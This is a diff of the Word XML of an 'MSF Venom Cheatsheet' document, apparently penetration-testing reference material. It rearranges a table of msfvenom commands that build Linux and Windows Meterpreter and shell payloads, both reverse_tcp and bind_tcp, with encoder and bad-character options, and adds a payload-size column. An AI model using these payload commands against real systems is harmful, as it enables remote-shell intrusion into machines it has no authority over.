--- a/MSF Venom Cheatsheet.docx
+++ b/MSF Venom Cheatsheet.docx
@@ -5,28 +5,117 @@
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="14850" w:type="dxa"/>
+        <w:tblW w:w="15084" w:type="dxa"/>
         <w:tblInd w:w="-1085" w:type="dxa"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="11520"/>
-        <w:gridCol w:w="3330"/>
+        <w:gridCol w:w="10800"/>
+        <w:gridCol w:w="3060"/>
+        <w:gridCol w:w="1224"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="0" w:name="_GoBack" w:colFirst="0" w:colLast="1"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Command</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Payload </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Bytes</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10800" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
@@ -57,7 +146,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -73,6 +162,19 @@
               </w:rPr>
               <w:t>List available payloads</w:t>
             </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -82,7 +184,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -108,60 +210,105 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p &lt;PAYLOAD&gt; -e &lt;ENCODER&gt; -f &lt;FORMAT&gt; -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>i</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> &lt;ENCODE COUNT&gt; LHOST=&lt;IP&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Payload</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Encoding</w:t>
-            </w:r>
+              <w:t xml:space="preserve"> -p </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>linux</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/x86/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>bind_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> --list-options</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>List options for a specific payload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+        <w:trPr>
+          <w:trHeight w:val="98"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -187,129 +334,74 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>linux</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>/x86/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell.elf</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Meterpreter  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>reverse</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> shell</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> x86 multi stage</w:t>
-            </w:r>
+              <w:t xml:space="preserve"> -p &lt;PAYLOAD&gt; -e &lt;ENCODER&gt; -f &lt;FORMAT&gt; -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>i</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &lt;ENCODE COUNT&gt; LHOST=&lt;IP&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -b &lt;BAD CHARS&gt; -a &lt;ARCHITECTURE&gt; </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Payload Encoding</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -380,16 +472,16 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>bind_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> RHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -405,7 +497,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -434,7 +526,7 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>bind</w:t>
+              <w:t>reverse</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
@@ -449,22 +541,38 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>x86 multi stage</w:t>
+              <w:t xml:space="preserve"> x86 multi stage</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>123</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+        <w:trPr>
+          <w:trHeight w:val="50"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -508,21 +616,99 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>/x64/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell_bind_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              <w:t>/x86/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>bind_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> RHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell.elf</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Meterpreter  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>bind</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> shell</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
@@ -530,55 +716,30 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">RHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell.elf</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Linux </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>bind</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> shell x64 single stage</w:t>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>x86 multi stage</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>110</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -586,7 +747,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -639,7 +800,7 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>shell_reverse_tcp</w:t>
+              <w:t>shell_bind_tcp</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -672,21 +833,55 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Linux reverse shell x64 single stage</w:t>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Linux </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>bind</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> shell x64 single stage</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>86</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -694,7 +889,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -720,66 +915,39 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Windows</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t xml:space="preserve"> -p </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>linux</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/x64/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell_reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
@@ -787,17 +955,61 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Meterpreter</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> reverse shell</w:t>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">RHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
